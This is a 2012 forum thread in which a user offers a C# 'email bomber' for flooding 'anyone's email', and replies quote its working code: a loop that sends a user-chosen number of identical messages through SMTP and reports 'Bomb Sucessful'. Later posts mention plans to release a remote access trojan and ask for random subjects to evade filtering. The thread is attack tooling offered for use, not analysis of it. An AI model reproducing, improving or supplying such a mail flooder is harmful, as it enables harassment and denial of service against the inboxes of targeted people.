Post: C# Email Bomber
04-13-2012, 04:52 PM #1
(adsbygoogle = window.adsbygoogle || []).push({}); Sup NGU, I have created an email bomber, just fill out the required fields and bomb anyone's email. And I do not log email passwords or emails!

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This program was created by me in C#, enjoy.

Scan it yourself, no viruses.
04-13-2012, 05:43 PM #2
Originally posted by xDante View Post
Sup NGU, I have created an email bomber, just fill out the required fields and bomb anyone's email. And I do not log email passwords or emails!

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Download: You must login or register to view this content.

Virus Scan: You must login or register to view this content.

This program was created by me in C#, enjoy.

Scan it yourself, no viruses.

The UI could be cleaned up. Rather than using large buttons, make everything more proportional.
The code looks nice.
MailAddress mailAddress = [COLOR=#008b8b][B]new[/B][/COLOR] [COLOR=#191970][B]MailAddress[/B][/COLOR]([B]this[/B].fieldFromAcc.Text + [COLOR=#0000ff]""[/COLOR], [COLOR=#0000ff]""[/COLOR]);
MailAddress to = [COLOR=#008b8b][B]new[/B][/COLOR] [COLOR=#191970][B]MailAddress[/B][/COLOR]([B]this[/B].fieldTo.Text, [COLOR=#0000ff]""[/COLOR]);
[COLOR=#ff0000]string[/COLOR] text = [B]this[/B].fieldFromPass.Text;
[COLOR=#ff0000]string[/COLOR] text2 = [B]this[/B].fieldSubject.Text;
[COLOR=#ff0000]string[/COLOR] text3 = [B]this[/B].fieldMessage.Text;
[COLOR=#ff0000][B]int[/B][/COLOR] num = [COLOR=#ff0000][B]int[/B][/COLOR].[COLOR=#191970][B]Parse[/B][/COLOR]([B]this[/B].fieldTime.Text);
[COLOR=#ff0000][B]int[/B][/COLOR] num2 = [COLOR=#00008b]0[/COLOR];
[B]this[/B].progBar.Maximum = num;
[B]this[/B].progBar.Minimum = [COLOR=#00008b]0[/COLOR];
[COLOR=#0000ff][B]while[/B][/COLOR] (num2 != num && [B]this[/B].can_send)
[B]this[/B].progBar.Value = num2;
SmtpClient smtpClient = [COLOR=#008b8b][B]new[/B][/COLOR] SmtpClient
Host = [COLOR=#0000ff]""[/COLOR],
Port = [COLOR=#00008b]587[/COLOR],
EnableSsl = [COLOR=#008b8b][B]true[/B][/COLOR],
DeliveryMethod = SmtpDeliveryMethod.Network,
Credentials = [COLOR=#008b8b][B]new[/B][/COLOR] [COLOR=#191970][B]NetworkCredential[/B][/COLOR](mailAddress.Address, text),
Timeout = [COLOR=#00008b]20000[/COLOR]
[COLOR=#008000][B]using[/B][/COLOR] (MailMessage mailMessage = [COLOR=#008b8b][B]new[/B][/COLOR] [COLOR=#191970][B]MailMessage[/B][/COLOR](mailAddress, to)
Subject = text2,
Body = text3
[B]this[/B].fieldTime.Text = (num - num2).[COLOR=#191970][B]ToString[/B][/COLOR]();
[COLOR=#0000ff][B]if[/B][/COLOR] ([B]this[/B].can_send)
[B]this[/B].fieldTime.Text = [COLOR=#0000ff]"0"[/COLOR];
[B]this[/B].progBar.Value = num2;
MessageBox.[COLOR=#191970][B]Show[/B][/COLOR]([COLOR=#0000ff]"Bomb Sucessful"[/COLOR]);
[B]this[/B].fieldTime.Text = [COLOR=#0000ff]"0"[/COLOR];
[B]this[/B].progBar.Value = [COLOR=#00008b]0[/COLOR];
MessageBox.[COLOR=#191970][B]Show[/B][/COLOR]([COLOR=#0000ff]"You messed something up!"[/COLOR]);

For this, change it to this, it will make it look cleaner.
[COLOR=#0000ff][B]private[/B][/COLOR] [COLOR=#ff0000]void[/COLOR] [COLOR=#191970][B]button1_Click[/B][/COLOR]([COLOR=#ff0000]object[/COLOR] sender, EventArgs e)
MessageBox.[COLOR=#191970][B]Show[/B][/COLOR]([COLOR=#0000ff]"This program was created by Dante.\nPlease visit and https://**********.com/ !", "About"[/COLOR]);
04-14-2012, 02:22 AM #3
Originally posted by Sublimity View Post
The UI could be cleaned up. Rather than using large buttons, make everything more proportional.
The code looks nice.
MailAddress mailAddress = [COLOR=#008b8b][B]new[/B][/COLOR] [COLOR=#191970][B]MailAddress[/B][/COLOR]([B]this[/B].fieldFromAcc.Text + [COLOR=#0000ff]""[/COLOR], [COLOR=#0000ff]""[/COLOR]);
MailAddress to = [COLOR=#008b8b][B]new[/B][/COLOR] [COLOR=#191970][B]MailAddress[/B][/COLOR]([B]this[/B].fieldTo.Text, [COLOR=#0000ff]""[/COLOR]);
[COLOR=#ff0000]string[/COLOR] text = [B]this[/B].fieldFromPass.Text;
[COLOR=#ff0000]string[/COLOR] text2 = [B]this[/B].fieldSubject.Text;
[COLOR=#ff0000]string[/COLOR] text3 = [B]this[/B].fieldMessage.Text;
[COLOR=#ff0000][B]int[/B][/COLOR] num = [COLOR=#ff0000][B]int[/B][/COLOR].[COLOR=#191970][B]Parse[/B][/COLOR]([B]this[/B].fieldTime.Text);
[COLOR=#ff0000][B]int[/B][/COLOR] num2 = [COLOR=#00008b]0[/COLOR];
[B]this[/B].progBar.Maximum = num;
[B]this[/B].progBar.Minimum = [COLOR=#00008b]0[/COLOR];
[COLOR=#0000ff][B]while[/B][/COLOR] (num2 != num && [B]this[/B].can_send)
[B]this[/B].progBar.Value = num2;
SmtpClient smtpClient = [COLOR=#008b8b][B]new[/B][/COLOR] SmtpClient
Host = [COLOR=#0000ff]""[/COLOR],
Port = [COLOR=#00008b]587[/COLOR],
EnableSsl = [COLOR=#008b8b][B]true[/B][/COLOR],
DeliveryMethod = SmtpDeliveryMethod.Network,
Credentials = [COLOR=#008b8b][B]new[/B][/COLOR] [COLOR=#191970][B]NetworkCredential[/B][/COLOR](mailAddress.Address, text),
Timeout = [COLOR=#00008b]20000[/COLOR]
[COLOR=#008000][B]using[/B][/COLOR] (MailMessage mailMessage = [COLOR=#008b8b][B]new[/B][/COLOR] [COLOR=#191970][B]MailMessage[/B][/COLOR](mailAddress, to)
Subject = text2,
Body = text3
[B]this[/B].fieldTime.Text = (num - num2).[COLOR=#191970][B]ToString[/B][/COLOR]();
[COLOR=#0000ff][B]if[/B][/COLOR] ([B]this[/B].can_send)
[B]this[/B].fieldTime.Text = [COLOR=#0000ff]"0"[/COLOR];
[B]this[/B].progBar.Value = num2;
MessageBox.[COLOR=#191970][B]Show[/B][/COLOR]([COLOR=#0000ff]"Bomb Sucessful"[/COLOR]);
[B]this[/B].fieldTime.Text = [COLOR=#0000ff]"0"[/COLOR];
[B]this[/B].progBar.Value = [COLOR=#00008b]0[/COLOR];
MessageBox.[COLOR=#191970][B]Show[/B][/COLOR]([COLOR=#0000ff]"You messed something up!"[/COLOR]);

For this, change it to this, it will make it look cleaner.
[COLOR=#0000ff][B]private[/B][/COLOR] [COLOR=#ff0000]void[/COLOR] [COLOR=#191970][B]button1_Click[/B][/COLOR]([COLOR=#ff0000]object[/COLOR] sender, EventArgs e)
MessageBox.[COLOR=#191970][B]Show[/B][/COLOR]([COLOR=#0000ff]"This program was created by Dante.\nPlease visit and https://**********.com/ !", "About"[/COLOR]);

I kind of like the large buttons, but yeah I'll take your advice, I am hoping to release a custom RAT soon :3
04-14-2012, 02:36 AM #4
Originally posted by xDante View Post
I kind of like the large buttons, but yeah I'll take your advice, I am hoping to release a custom RAT soon :3

Good luck with that.

If you show you are trustworthy on here, I may let you test it on my computer.
04-14-2012, 05:30 PM #5
Originally posted by Sublimity View Post
Good luck with that.

If you show you are trustworthy on here, I may let you test it on my computer.

Appreciated, I can see you are good at C# if I need any help I'll let you know.
04-17-2012, 01:53 AM #6
Thats very Cool now Ztime to Download Happy
03-15-2014, 07:22 PM #7
Friend i need make some thing different, i need the programa make a random subject, can you do it ?

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